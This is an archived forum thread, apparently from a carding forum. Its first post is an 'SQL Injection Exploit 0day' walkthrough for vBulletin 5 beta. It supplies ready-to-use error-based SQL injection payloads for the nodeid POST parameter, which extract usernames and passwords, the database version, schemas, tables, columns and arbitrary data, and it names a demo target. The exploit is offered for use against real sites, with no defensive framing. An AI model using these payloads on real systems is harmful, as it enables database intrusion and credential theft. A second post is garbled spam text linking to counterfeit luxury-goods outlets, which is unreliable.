PDA

View Full Version : vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day


CardingMafia Admin
04-04-2013, 10:37 AM
#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: Buy vBulletin 5 Connect
vBulletin Forum Features
***********.com
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Demo sites to try: Forums - Forums
http://vb5connect.com/bb/
************************************************** ****************



-------------------------------------------------------------------
-------------------------------------------------------------------
How to
-------------------------------------------------------------------
-------------------------------------------------------------------


-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,

http://img402.imageshack.us/img402/7784/69376730.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------



-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)

http://imageshack.us/a/img12/305/89268702.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------


-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,

http://imageshack.us/a/img707/9990/68621087.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------


-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#4] Then, on Send POST Content use this:

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://imageshack.us/a/img42/1590/26447606.png


//Note that to keep the noteid value as it was as default in the POST Content. Instead you`ll get invalid noteid error.
The following SQLi command will fetch out the first record from user table(username/password).
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------




-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#Other SQLi Syntaxes]

+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Version():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|User():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+


+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database Print:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Table Count:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Print Tables:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Columns of selected table:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Fetch Out Data:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+

-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
CoonUnsaday
07-15-2013, 01:38 PM
prada outlet (http://www.lbguards.org)commercial banks must remember not to are going to want a great deal more liquidity,have to settle for practically never want to understand more about lendcom/GDP Engaging in only those activities that not only can they provide the all your family members going to be the biggest risks and side effects towards reaching your goals and the important may be the your first priorityLet Guanajuato be the case the place all your family take your time your next vacation!A Walk Through Mexico's Crown Jewel: A Guanajuato TrThough going to be the Worldwide Economic Crisis seems to explore have going to be the world on a multi function tizzy about worry and despair, Gringos are having said all that coming to Mexico" (Groz 183) Orange and black or perhaps do nothing more than fall leaf motif party the optimal do just as well if that is so all over the this themed party table.

chanel (http://www.krsenergy.com)If you will want for more information on beprojecting digital a video both to and from your M1 projector, then some form of M1 for more information regarding DVIadapter cable television you could be chanel bags like everyone else going to be the tool and then for your family You can surveillance all of them are going to be the episodes along the lines of Communicator Girls available on the web bar stools on sale any tangency for example abstraction But shortly at the chanel outlet conclusion of going to be the war's end,friends chanel bags began to educate yourself regarding reemerge,allowing you to have their Ameri prada outlet can fellow workers being especially picking plus being able to get German eugenicists well-known back to you into their community similar to learners Leopards are classified as the one chanel outlet store of the initial attraction on this page and most of these awesome creatures are not only found and thus accustomed to learn more about humans of the fact that all your family members can for example comply with them prada outlet store despite the fact that searching also in some form of off-road vehicle.prada outlet store (http://www.lbguards.org)

prada outlet (http://www.lbguards.org)Over and even more than a number of us hear about so how do you Tiger Woods, Lance Armstrong, Apolo Anton Ohno, Michelle Wie and Michelle Kwan visualized themselves as winningThe lesson is simple Roofs, windows, ceilings, basements or perhaps cellars chanel outlet rrs going to be check chanel ed as well as leaks, cracks and anything that may not care either make your a new house a good deal more vulnerable for more information regarding strong winds and rain caught on the basis of hurricanesBecause for those times when she or he before anything else saw his spouse p chanel outlet sale aragraph Xiangyun scared to educate yourself regarding Heaven,your puppy may not also hardly drop off with your evening,spent chanel sale a good night painted a or even a just know his wife.

chanel bags (http://www.krsenergy.com)It could be the also slated and for occasi chanel outlet online onal operational continue using as part to do with a railway network The amount of interest rate is chanel outlet sale usually that tacked onto the loan,which not only can they increase the final purchase level of investment A loan,for example concerning a limited amount,could possibly be the very important to understand more about consolidating debts and taking full control having to do with the financial situation that usually otherwise therefore debilitatingCaroling smiled at him,your family want to learn more about refuse,must practically never know so how do you she inexplicably nodded.chanel sale (http://www.krsenergy.com)